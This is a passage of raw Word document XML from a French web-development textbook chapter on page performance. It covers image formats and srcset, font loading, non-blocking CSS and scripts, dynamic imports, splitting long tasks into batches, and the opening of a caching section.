                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Format moderne (WebP, AVIF)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2554"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>30 à 60 %</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2554"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Faible</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="390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Dimension adaptée à l'affichage</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="255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Jusqu'à 80 %</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="255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Faible</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3906"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>srcset</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> et </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>sizes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2554"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Variable</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2554"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Moyen</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="390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Chargement différé</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="255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Élevé au premier écran</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="255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Très faible</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3906"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Compression de qualité</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2554"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>10 à 30 %</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2554"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Très faible</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="80" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Une image adaptée à chaque écran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&lt;img</w:t>
        <w:br/>
        <w:t xml:space="preserve">  src="paysage-800.avif"</w:t>
        <w:br/>
        <w:t>srcset="paysage-400.avif 400w, paysage-800.avif 800w, paysage-1600.avif 1600w"</w:t>
        <w:br/>
        <w:t xml:space="preserve">  sizes="(max-width: 600px) 100vw, 50vw"</w:t>
        <w:br/>
        <w:t xml:space="preserve">  width="800" height="533"</w:t>
        <w:br/>
        <w:t xml:space="preserve">  alt="Vallée brumeuse au lever du jour"</w:t>
        <w:br/>
        <w:t xml:space="preserve">  loading="lazy"</w:t>
        <w:br/>
        <w:t xml:space="preserve">  decoding="async"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Les attributs </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>width</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> et </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>height</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> réservent l'espace avant chargement et évitent un décalage de mise en page — l'une des causes principales de CLS.</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NE DIFFÉREZ PAS L'IMAGE PRINCIPALE</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>loading="lazy"</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> sur l'image du premier écran retarde le LCP. Réservez le chargement différé aux images situées plus bas, et utilisez </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>fetchpriority="high"</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> pour l'image principale.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>33.3 Polices</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Une police web déclenche un téléchargement qui peut bloquer l'affichage du texte. Trois réglages limitent l'attente.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Une police qui n'attend pas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@font-face {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  font-family: "Inter";</w:t>
        <w:br/>
        <w:t xml:space="preserve">  src: url("/polices/inter-latin.woff2") format("woff2");</w:t>
        <w:br/>
        <w:t xml:space="preserve">  font-display: swap;              /* affiche un substitut immédiatement */</w:t>
        <w:br/>
        <w:t xml:space="preserve">  unicode-range: U+0000-00FF;      /* sous-ensemble latin uniquement */</w:t>
        <w:br/>
        <w:t xml:space="preserve">  font-weight: 400 700;            /* variable, un seul fichier */</w:t>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Un préchargement ciblé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 Précharger la police réellement utilisée au premier écran --&gt;</w:t>
        <w:br/>
        <w:t>&lt;link rel="preload" href="/polices/inter-latin.woff2"</w:t>
        <w:br/>
        <w:t xml:space="preserve">      as="font" type="font/woff2" crossorigin&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Limitez-vous à deux familles et à trois graisses. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>font-display: swap</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> affiche immédiatement un substitut, quitte à provoquer un léger changement d'aspect une fois la police chargée.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>33.4 Chemin critique de rendu</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Le navigateur doit analyser le HTML, télécharger les CSS, construire l'arbre de rendu, calculer la mise en page, puis peindre. Chaque ressource bloquante allonge ce chemin.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Différer ce qui n'est pas critique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 Bloquant : à éviter --&gt;</w:t>
        <w:br/>
        <w:t>&lt;link rel="stylesheet" href="tout.css"&gt;</w:t>
        <w:br/>
        <w:br/>
        <w:t>&lt;!-- Non bloquant : le CSS critique est en ligne, le reste différé --&gt;</w:t>
        <w:br/>
        <w:t>&lt;style&gt;/* règles du premier écran, quelques centaines d'octets */&lt;/style&gt;</w:t>
        <w:br/>
        <w:t>&lt;link rel="stylesheet" href="tout.css" media="print"</w:t>
        <w:br/>
        <w:t xml:space="preserve">  onload="this.media='all'"&gt;</w:t>
        <w:br/>
        <w:t>&lt;noscript&gt;&lt;link rel="stylesheet" href="tout.css"&gt;&lt;/noscript&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Trois façons de ne pas bloquer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 Script : ne jamais bloquer l'analyse --&gt;</w:t>
        <w:br/>
        <w:t>&lt;script src="app.js" defer&gt;&lt;/script&gt;</w:t>
        <w:br/>
        <w:t>&lt;script src="analytics.js" async&gt;&lt;/script&gt;</w:t>
        <w:br/>
        <w:t>&lt;script type="module" src="principal.js"&gt;&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.106 — Ce que chaque ressource bloque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245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Ressource</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="204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Bloque l'analyse</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="204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Bloque le rendu</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="245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Traitement</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2458"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>CSS classique</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2049"/>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2049"/>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2458"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>En ligne pour le critique</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2458"/>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&lt;script&gt;</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> sans attribut</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="204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204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Indirectement</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2458"/>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defer</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> ou module</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2458"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>defer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2049"/>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2049"/>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2458"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Ordre préservé</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2458"/>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async</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="204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204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245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Ordre libre</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2458"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Image</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2049"/>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2049"/>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2458"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Dimensions réservées</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="80" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>33.5 Scripts et travail du navigateur</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Un fichier JavaScript coûte deux fois : il faut le télécharger puis l'exécuter. Le découpage en morceaux évite d'envoyer au navigateur du code qu'il n'utilisera peut-être jamais.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Un module chargé à la demande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Chargement à la demande, au moment utile</w:t>
        <w:br/>
        <w:t>boutonPartage.addEventListener("click", async () =&gt; {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  const { partager } = await import("./modules/partage.js");</w:t>
        <w:br/>
        <w:t xml:space="preserve">  partager(document.title, location.href);</w:t>
        <w:br/>
        <w:t>});</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Découper un traitement long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Décharger un travail long pour garder l'interface réactive</w:t>
        <w:br/>
        <w:t>function traiterParLots(elements, traiter, taille = 200) {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  let index = 0;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  function lot() {</w:t>
        <w:br/>
        <w:t xml:space="preserve">    const fin = Math.min(index + taille, elements.length);</w:t>
        <w:br/>
        <w:t xml:space="preserve">    for (; index &lt; fin; index += 1) traiter(elements[index]);</w:t>
        <w:br/>
        <w:t xml:space="preserve">    if (index &lt; elements.length) requestAnimationFrame(lot);</w:t>
        <w:br/>
        <w:t xml:space="preserve">  }</w:t>
        <w:br/>
        <w:t xml:space="preserve">  lot();</w:t>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Les tâches longues de plus de 50 ms bloquent les interactions : l'utilisateur clique et rien ne se passe. Découper, différer ou déplacer vers un </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>worker</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> préserve la réactivité.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>33.6 Mise en cache</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Un second chargement doit être beaucoup plus rapide que le premier. La mise en cache est le levier le plus rentable, à condition de nommer les fichiers par leur empreinte.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
